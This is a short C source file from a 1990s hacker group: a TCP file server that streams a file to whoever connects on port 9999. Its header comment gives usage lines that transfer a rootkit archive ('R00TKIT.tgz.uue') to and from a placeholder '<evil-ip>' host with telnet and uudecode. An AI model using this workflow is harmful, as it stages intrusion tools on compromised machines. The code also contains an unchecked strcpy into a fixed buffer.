/*	Binary/Text Data Server -- xfers data over high TCP ports  
 *	by Mindmaniac 1996 [THC]
 *	
 *	compile:	     cc -o svr svr.c (add "-lnsl -lsocket" for SUN)  
 *
 *	on server host:	     svr -fR00TKIT.tgz.uue <evil-ip>			
 *
 *	on receiver host:    telnet <evil-ip> 9999 | uudecode
 *
 *
 RELEASE NOTE: PRODUCT UNREVISITED - TO BE RELEASED AS IS - 1998
 */
 
#define PORT 9999
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>

main(argc, argv) 
int argc;
char **argv;
{
char ch;
FILE *fp;
char hostname[128];
struct hostent *hp;
register int i, s, ns;
struct sockaddr_in sin, fsin;
int fromlen = sizeof(fsin); 
FILE *in = stdin;
char str[64];
struct stat statbuf;
int port = PORT;
char *filename="";
long size=0;
long count=0;

if (argc<2) {
  printf("Usage:    %s [-sSIZE] [-pPORT] [-fFILE] server-hostname\n",argv[0]);
  printf("Defaults: PORT   = %d\n",PORT);
  printf("          FILE   = stdin (size needs to be specified)\n");
  exit(1);
}
    

while ((argc > 1) && (argv[1][0] == '-')) {
 switch (argv[1][1]) {
  case 'p':
   port = atoi(&argv[1][2]);
   break;
  case 's':
   size = atoi(&argv[1][2]);
   break;
  case 'f':
   filename = &argv[1][2];
   break;
  default:
   printf("bad option\n");
   exit(1);
 }
argc--;
argv++;
}
                              
if (argc == 1) {
  printf("no hostname specified\n");
} else {
 strcpy(hostname,argv[1]);
}


if ((hp = gethostbyname(hostname)) == NULL) {
  fprintf(stderr, "%s: host unknown.\n", hostname);
  exit(1);
}

if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
  perror("server: socket");
  exit(1);
}

sin.sin_family = AF_INET;
sin.sin_port = htons(port);
memcpy(&sin.sin_addr, hp->h_addr, hp->h_length);

if (bind(s, &sin, sizeof(sin)) < 0) {
  perror("server: bind");
  exit(1);
}

if (!strcmp(filename,"")) {
  printf("reading from stdin..\n");
} 
else {
 if (stat(filename, &statbuf)) {
   printf("cannot open file %s\n", filename);
   exit(1);
 }
 size = statbuf.st_size;
 in = fopen(filename,"r");
}  

printf("host: %s, port %d, size: %d\n", hostname, port, size);  


if (listen(s, 5) < 0) {
  perror("server: listen");
  exit(1);
}

if ((ns = accept(s, &fsin, &fromlen)) < 0) {
  perror("server: accept");
  exit(1);
}
fp = fdopen(ns, "r");

count=0;
while (count<size) {
  str[0] = getc(in);
  send(ns, str, 1, 0);
  count++;
}
fclose(in);
close(s);
}
